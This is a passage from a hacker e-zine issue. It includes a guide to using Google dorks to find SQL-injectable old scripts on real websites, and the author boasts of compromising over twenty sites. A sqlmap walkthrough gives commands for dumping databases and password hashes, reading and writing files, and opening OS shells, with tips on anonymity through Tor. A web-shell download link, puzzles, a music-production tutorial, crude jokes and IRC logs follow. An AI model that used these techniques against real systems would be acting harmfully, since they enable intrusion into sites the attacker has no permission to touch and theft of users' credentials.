534ï€ªï€ If you are going to do anything really serious, don't do it from home.
535ï€ªï€ Don't do it from your personal computer.
536
537In the past year I have hacked over 20 major international and dutch websites using 1 method, and i have been rewarded to do so. I have received job offers and concert tickets, CD's and knowledge. Now you might be wondering, what is this method I used, well here I'll explain about it :)
538
539These days most sites use a combination of mod_rewrite and PHP to get nice and clean url's. These /canocinal/urls improve SEO and a user can easily read it. And most of the time it also improves security, that is because most frameworks run using a page ID for example: /234234' or '/ here only the integer is used out of the url.
540
541NOTE: always check for injections and errors even when there are no visible parameters.
542
543These days an average programmer know about the holy mysql_real_escape_string. They know how to implement a secure framework. And they might even know about prepared statements and advanced input filtering. That leaves us with one obvious vulnerability... old scripts.
544
545If you read the above text you might know what I mean, if not: Because the new sites, scripts and frameworks use canocinal url's and old ones do not, we can easily find old scripts laying around on the server still indexed by google. And because a few years back the whole input filtering and real_escape_string was a mystery for most developers, if we find a old script it's most likely a JACKPOT.
546
547Dorks and google search:
548
549Pick a site, for example foo.com. Lets start googling, first we enter a dork where we ask google to only display results from 1 site : "site:foo.com"
550
551Then we start filtering, if it's for example a blog, and everything on google is spammed with "/blog/ postID/" you can try "-blog" this filters all content where the text "blog" is found. So you might find some contact pages and information pages with a prefix of "/info/infoID/" let's do "-info" after the "site:foocom -blog" and there we go, some old pages including download scripts, SQLi vulnerable scripts. Maybe even a admin panel (if not check /robots.txt).
552
553This is a very big issue with alot of sites. Try it out for yourself :) also check out some dorks for when you can't just filter all content for e.x. "inurl:.php?*=*"
554
555Rank on sectools.org: 30
556Work on: Windows, Mac and Linux
557Programmed in: Python
558Price: free
559Homepage: http://sqlmap.org/
560Github: https://github.com/sqlmapproject/sqlmap
561Wiki: https://github.com/sqlmapproject/sqlmap/wiki
562
563Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program and nether do I “relaxâ€. Now with that said, let's start shall we? :D
564
565Sqlmap is one of the best automated sql-injection tools out there, if not THE best. It's an open source, python project that can do in seconds what takes a human minutes or hours if it's even possible to do.
566
567Sqlmap has support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.It also has full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
568
569I personally don't know Sqlmap that well except for some of the standard features and basic usage, but I will try to give my view of it. There are also different ways of using this tool depending on how well you know it, how much noise you want to make, and how big the database is.
570
571A good thing to remember is that all logs and database entries are saved in your output folder within your Sqlmap folder.
572
573Now lets boot up Sqlmap and look at the basics.
574
575first of we need to know what databases there are for us to explore
576
577./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" –dbs –dbms=mysql
578 tip:
579--threads=1 If you want to send more requests at the same time this is faster but it needs a good connection.
580--technique=BEUSTQ If you don't want to test all techniques because of noise or other reason.
581
582If nothing is found you can try to increase:
583 --level=(1-5)
584 --risk=(0-3)
585
586The output tells us that that the site is vulnerable to:
587
588boolean-based blind, error-based and union query and/or time-based blind sqlinjection.
589available databases [5]:
590[*] information_schema
591[*] mysql
592[*] performance_schema
593[*] vurln
59423
595vurln is the one we will explore to get some passwords from the awesome site 127.0.0.1 ^.^
596 ./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln –tables
597
598Output:
599Database: vurln
600[1 table]
601+-------+ | users |
602+-------+
603
604./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –col
605
606Output:
607Database: vurln
608Table: users
609[3 columns]
610+----------+-------------+
611| Column | Type | +----------+-------------+
612| ID | tinyint(4) |
613| password | varchar(32) |
614| username | varchar(20) |
615
616./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –dump
617
618This will tell us it found possible hashes and will ask if we want to crack them with dictionary attack and password suffixes, this is a good feature but unfortunately pretty slow, using oclHashcat (gpu cracking) would go much faster with a lot of entries and word list.
619
620However this awesome site (127.0.0.1) is small so we will go for it.
621
622Output:
623Database: vurln
624Table: users
625[126 entries]
626+-----+----------+------------------------------------------+
627| ID | username | password |
628+-----+----------+------------------------------------------+ | 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) |
629| 2 | relax | 098f6bcd4621d373cade4e832627b4f6 (test) |
630| 3 | Tadou | 253614bbac999b38b5b60cae531c4969 (2012) | | 4 | Gevoo | 98b1e16f65a1500023372d2b362c0991 |
631| 5 | Beguu | cff34ad343b069ea6920464ad17d4bcf | [...]
632
633Lets look at some other scenarios.
634
635if this site would use post request instead of get we would specify that:
636./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" --dbs
637
638if you want to search for something specific like columns with the name password:
639./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --search -C password File features like:
640
641read:
642./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" \ --file-read="/var/www/ vurln.php"
643
644Will save the remote file vurln.php locally in your output folder for the domain. And you will need to know the full path to the file. Look at full path disclosure vulnerability for more info about this.
645
646Write:
647./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" \ --file-write
648"i_was_never_here.txt" --file-dest "/var/www"
649
650Some shell features that are awesome to know:
651
652OS shell: ./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" –os-shell
653
654Sql Shell: ./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --sql-shell
655
656check my old tutorial about uploading sql shell for more information about how to use it:
657http://goo.gl/4HIbW
658
659Remember if you can't read/write files with the file features you should try the shell features.
660
661Basic usage of Sqlmap is not harder then that, but just in case you haven't had enough yet, heres some extra features:
662
663If your not afraid of noise:
664./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" --exclude-sysdbs –dump-all
665will give you everything except system databases in this case “information_schema†and “mysql†database
666
667for the curious user you have:
668./sqlmap.py -g “inurl:index.php?id=â€
669
670Google dork - this will find vulnerable site from Google for you, but as stated above this is illegal if you do not have permission from the site owner and are following all laws.
671
672For the one who wants to be anonymous or extra careful:
673--proxy=PROXY
674--tor=ADDRESS
675--tor-port=PORT
676--check-waf
677--crawl=DEPTH
678
679
680The vurln.php file for the one who WILL test this legally >.>
681
682
683So what can we say about Sqlmap?
684It is a very powerful tool, but like all automatic scanners, it won't find everything, you will have to get your hands dirty in a lot cases. And it generates a lot of noise if you don't want to get spotted. But it is an excellent tool that will do work for you that in other cases would take you a lot longer or would be impossible.
685
686
687
688This issue we have a small EvilZone php shell made by ande. It's light and compact. Here's what the author has to say:
689
690
691
692Features:
693
694
695
696Download link: http://goo.gl/SfFJF
697
698
699Here are two challenges, the first by Deque and the second by bluechill
700You can send your results to ezine@evilzone.org
701
702
703This is a little task for everyone who wants a little challenge. There are two definitions of functions in pseudocode called f and t.
704
705Your task: Provide the same functions without using recursion.
706
707Note: The first one is much easier than the second.
708
709Function 1:
710
711 f (int x) { if x > 52
712 then return x - 11 else return f(f(x + 12))
713 }
714
715Function 2:
716
717 t (int x, int y, int z) { if x <= y then return z + 1
718 else return t(t(x - 1, y, z) , t(y - 1, z, x), t(z - 1, x, y))
719 }
720
721
722This image can also be found here: https://www.evilzone.org/ezine_challenge/1/start.html
723
724010110010100011101000111010001110100001000001001000111000001100001000110010001000100010
7250000110010101010001000101010110100101101101001011010111000101110101010010000111110101110
7260010000010101000000011110010101100100100101011110010111110101011001101100010101000101100
7271010100100101111101011011010101000101110101010100010100100001111000000010000111000101011
7280010100110101000001010111010100100101011101010100010110110000011000000011000000000000011
729101101000000000000110110001011111010111000101000001000000010110110101001100011111010001 110100101101000011
73025
731It isn't uncommon for people to want to get into the wonderful world of electronic music creation, the only problem is, there is so much to learn and so many different paths you can take. The music doesn't come from the DAW (digital audio workstation) it comes from you. The faster you realize this, the faster you can be on your way to being a music legend.
732
733So first things first, you need a DAW. like I said before there are many different options, you could go with Logic, pro tools, garage band, or my favorite, FL Studio. There are many many others but we are going to stick with FL Studio 10. (If you are a linux user, you could use LMMS (Linux multimedia Studio) This is open sourced and free.
734
735FL Studio, is a professional DAW, with the capabillities to do so much more than it is given credit for. It is by far the easiest to start out on, so we will work with it. So download your copy of FL Studio, and then if you don't want to use the defaults get the following plugins. Sylenth1 v2.1, Nexus, and the vengence sound packs for your drum samples. I also reccomend audacity for recording sound clips
736
737Once you have everything you need, you can get started. Open up a new project file by going to File>New
738
739If this is your first time using FL Studio it can seem a little overwhelming, so I put these pictures together for a reference:
740
741
742
743
74426
745Playlist -- This will open your playlist, that is the main screen that is active. You place your pattern clips here to combine into the song.
746
747Piano Roll -- shows the piano roll for the selected channel
748
749Tempo -- sets the tempo for the entire song
750
751Pattern -- shows the pattern editor
752
753Playback Controls -- The PAT/SONG options switch between playing the current pattern and song.
754
755Volume -- Sets the volume for the entire song
756
757Pitch -- Sets the pitch for the entire song
758
759Turn track ON/OFF -- When you have multiple patterns playing you can turn the individual tracks on and off to hear something by itself.
760
761Sequencer -- You do the majority of your building in this tab, here is a picture:
762
763
764
765
766Volume -- Sets the volume for the particular channel Pan- Pan for the particular channel
767Right click for options- To get to piano roll, right click and then click piano roll
768
769Filter Options -- This shows the filter to filter out., eg. audio clips
770
771Pattern Length -- The standard is 4 but you can change the set length (note: piano roll automatically expands the length)
772
773When you hover over stuff it will tell you what it does in the upper left hand corner.
774
775Setting up SYLENTH1:
776
777— After you have installed Sylenth1 go to: CHANNELS --> Add one --> More
778
779— On the window that pops up at the bottom right click: Refresh --> Fast scan (recommended)
780
781— Under the section labeled "VST 1 & 2 plugins" and make sure the box is ticked beside
782
783— After you have done this, you can go to: CHANNELS --> Add one --> Sylenth1
784
785You now have an open sylenth1 window, click on the sequencer tab if it isn't already open, you should see sylenth1 on there somewhere, probably at the bottom of the list.
78627
787Right click it select Piano Roll and A new window will pop up:
788Place some notes and hit the play button, make sure the PAT box is ticked. It probably sounds like crap but its ok. Want to change the sound? This is how, Open up your sequencer and click on the Sylenth1 tab. Sylenth1 should open, then click here:
789
79028
791
792
793
794Play around with the sounds and your pattern till you get something that sounds good. I'll go with something basic.
795
796
797Then place that shit:
798
799Congratulations, you have made your first audio.
800
801Next time, we will cover drums, keeping in rythm and maybe automations! Have fun and good luck, don't ever give up!
802
803
804
80530
806Prostate examinations, that happen in room 32B, are mandatory for all new male members. Room origins are largely unknown however the Evilzone conspiracy theorists speculate that it was built sometime a few months ago. Taking a look at some of the experience reports in the Evilzone feedback archive a few months back we noticed room 32B's activity at a high point.
807
808As well as many other members advocating room existence, Dr.
809m0rph is a great doctor, albeit absolutely uncertified and uneducated. So if you haven't been there you really need to pay a visit. It's on the third floor to the left. As said before it IS mandatory unless you possess a grease purse. If not, further avoidance will be punished severely.
810
811What happens behind the sound-proof doors when you go in is unknown as it is frowned upon to speak of personal experiences in the room but it will be a memory you will never forget. Dr m0rph secretly mentions the feeling is similar to having a porcupine, three pine cones and a Super Shredder
812from the ninja turtles, rocket launched into your anus with a total force of 5.2 G's.
813
814How that is done is very unknown to the masses, because those who had felt it, never wishes to speak of it.
815Some evidence suggests the secret contraption is called "AccuPuncher 3000" aka "Jixster Extreme" aka "The Jixster" aka "Jack the Jixster" and it is truly a force to be reckoned with and some photos exist as a proof of its existence. Not much proof exists because of the secrecy and room guardians.
816
817Jixster 2000 Jixster 3000 Room 32B Guardian
818
81931
820Computer related Jokes
821
8221.) Great news for Bill Gates
823
824Bill Clinton, Boris Yeltsin, and Bill Gates were called in by God. God informed them that he was very unhappy about what was going on in this world. Since things were so bad, he told the three that he was destroying the Earth in 3 days. They were all allowed to return to their homes and businesses and tell their friends and colleagues what was happening. God did tell them though, that no matter what they did he was "not" changing his mind.
825
826Bill Clinton went in and told his staff, "I have good news and bad news for you. First the good news . . . there
827"is" a God. The bad news is that he is destroying the Earth in 3 days."
828
829Boris Yeltsin went back and told his staff, "I have good news and terrible news. The first is that there "is" a God. The second is that he is destroying the Earth in 3 days."
830
831Bill Gates went back and told his staff, "I have good news and good news. First, God thinks I am one of the three most important people in the world. Secondly, you don't have to fix the bugs in Windows 8.
832
8332.) Software development cycle
834
8351. Programmer produces code he believes is bug-free.
8362. Product is tested. 20 bugs are found.
8373. Programmer fixes 10 of the bugs and explains to the testing department that the other 10 aren't really bugs.
8384. Testing department finds that five of the fixes didn't work and discovers 15 new bugs.
8395. Repeat three times steps 3 and 4.
8406. Due to marketing pressure and an extremely premature product announcement based on overlyoptimistic programming schedule, the product is released.
8417. Users find 137 new bugs.
8428. Original programmer, having cashed his royalty check, is nowhere to be found.
8439. Newly-assembled programming team fixes almost all of the 137 bugs, but introduce 456 new ones.
84410. Original programmer sends underpaid testing department a postcard from Fiji. Entire testing department quits.
84511. Company is bought in a hostile takeover by competitor using profits from their latest release, which had 783 bugs.
84612. New CEO is brought in by board of directors. He hires a programmer to redo program from scratch.
84713. Programmer produces code he believes is bug-free.
848
8493.) Programmer's drinking song
850
85199 little bugs in the code,
85299 bugs in the code,
853Fix one bug, compile it again, 101 little bugs in the code.
854101 little bugs in the code,
855101 bugs in the code, Fix one bug, compile it again, 103 little bugs in the code.
85632
8574.) Possible IBM acronyms
858
859IBM: Inmense Ball of Muck IBM: It's Better than Macintosh!
860IBM: Idiots Built Me
861IBM: I've Been Mislead
862IBM: It's Better Manually
863IBM: Infinitly Better Macintosh IBM: I Blame Microsoft.
864IBM: I Bought Macintosh
865IBM: I've Been Moved
866IBM: I've Been Mugged
867IBM: Idiots Become Managers
868IBM: Incompatible Business Machines
869IBM: Incredibly Boring Machine
870IBM: Internal Beaurocratic Mess
871IBM: Intolerant of Beards and Mustaches
872IBM: It'll Be Messy
873IBM: It's Backwards, Man
874IBM: It Barely Moves
875
876
8775) Top ten signs you bought a bad computer
878
879
88010. Lower corner of screen has the words "Etch-a-sketch" on it.
881
8829. It's celebrity spokesman is that "Hey Vern!" guy.
883
8848. In order to start it, you need some jumper cables and a friend's car.
885
8867. It's slogan is "Pentium: redefining mathematics".
887
8886. The "quick reference" manual is 120 pages long.
889
8905. Whenever you turn it on, all the dogs in your neighborhood start howling.
891
8924. The screen often displays the message, "Ain't it break time yet?"
893
8943. The manual contains only one sentence: "Good Luck!"
895
8962. The only chip inside is a Dorito.
897
8981. You've decided that your computer is an excellent addition to your fabulous paperweight collection.
899
900
901
90233
9036.) Customer support logs
904
905Actual dialog of a former Customer Support employee:
906Support: "Ridge Hall computer assistant; may I help you?"
907Customer: "Yes, well, I'm having trouble with WordPerfect."
908Support: "What sort of trouble?"
909Customer: "Well, I was just typing along, and all of a sudden the words went away.",
910Support: "Went away?"
911Customer:"They disappeared."
912Support: "Hmm. So what does your screen look like now?"
913Customer: "Nothing."
914Support: "Nothing?"
915Customer: "It's blank; it won't accept anything when I type."
916Support: "Are you still in WordPerfect, or did you get out?"
917Customer: "How do I tell?"
918Support: "Can you see the C:\ prompt on the screen?"
919Customer: "What's a sea-prompt?"
920Support: "Never mind. Can you move the cursor around on the screen?"
921Customer: "There isn't any cursor: I told you, it won't accept anything I type."
922Support: "Does your monitor have a power indicator?"
923Customer: "What's a monitor?"
924Support: "It's the thing with the screen on it that looks like a TV. Does it have a little light that tells you when it's on?"
925Customer: "I don't know."
926Support: "Well, then look on the back of the monitor and find where the power cord goes into it. Can you see that?"
927Customer: ......"Yes, I think so."
928Support: "Great! Follow the cord to the plug, and tell me if it's plugged into the wall." Customer: ......"Yes, it is."
929Support: "When you were behind the monitor, did you notice that there were two cables plugged into the back of it, not just one?"
930Customer: "No."
931Support: "Well, there are. I need you to look back there again and find the other cable."
932Customer: ......"Okay, here it is."
933Support: "Follow it for me, and tell me if it's plugged securely into the back of your computer." Customer: "I can't reach."
934Support: "Uh huh. Well, can you see if it is?"
935Customer: "No."
936Support: "Even if you maybe put your knee on something and lean way over?" Customer:"Oh, it's not because I don't have the right angle-it's because it's dark." Support: "Dark?
937Customer: "Yes-the office light is off, and the only light I have is coming in from the window."
938Support: "Well, turn on the office light then."
939Customer:"I can't."
940Support: "No? Why not?"
941Customer: "Because there's a power outage."
942Support: "A power... A power outage? Aha! Okay, we've got it licked now. Do you still have the boxes and manuals and packing stuff your computer came in?"
943Customer: "Well, yes, I keep them in the closet."
944Support: "Good! Go get them, and unplug your system and pack it up just like it was when you got it. Then take it back to the store you bought it from."
945Customer: "Really? Is it that bad?"
946Support: "Yes, I'm afraid it is."
947Customer: "Well, all right then, I suppose. What do I tell them?"
948Support: "Tell them you're too stupid to own a computer."
949
95034
9517) Computer related memes
95235
9538) Epic IRC quotes
954
955Kulverstukas and Turborland:
956<TurboBorland> I hate/enjoy reading something and then ending up with like 12 different links I want to read next
957<Pillus> thank god for tabs, try that without it :p
958<Kulverstukas> :D
959<TurboBorland> I have IE6
960
961
962Satori and uNK (Posted by Kulverstukas)
963[21:50] <Satori> pfft
964[21:50] <Satori> we dont want your kind here
965[21:50] <Satori> :P
966[21:51] <-- uNk has quit (Ping timeout)
967
968
969The Hit of the issue. Directed, written and produced by Professor Potatoe * asdasdasdasd is now known as Father <Father> puddi, this is your father.
970<puddi> Uhh.. hey dad
971<puddi> what are you doing here?
972<Father> I've been told you are hanging out here with really bad people
973<puddi> But... but... they're my friends, my only friends you cant just seperate me from everyone <Father> Yes I can, now bend fucking over!
974* Father takes off belt
975<puddi> No daddy
976* puddi and his father go into a fight,
977* puddi somehow manages to hit his father with a vibrator in the head
978* Father is unconscious
979* puddi calls the doctor
980* Doctor (puddi@AEA79372.EFCEFFDB.52C73F4C.IP) has joined #evilzone <Doctor> i have come as fast as i can puddi, what has happened this time?
981<puddi> Oh nothing.. we just got into a little fight and an incident happened
982* Doctor checks Father's health <Doctor> puddi, <Doctor> ...
983<Doctor> I'm afraid your father suffered head trauma <Doctor> I'm afraid... <Doctor> your father is dead <puddi> No.. no...
984<puddi> NOOOOOOOOOOOOOOOOOOOOOOOOO
985<puddi> FUCKNO
986<Doctor> That'll be $2.99 thanks
987* ande (ande@hide-F58563C7.getinternet.no) has joined #evilzone
988<puddi> Take your shitty money my father is dead
989<Doctor> Well time to go
990* Doctor has quit (Quit: Cancer finished me off)
991* Father has quit (Quit: Flies to heaven)
992<ande> Oh hoy
99336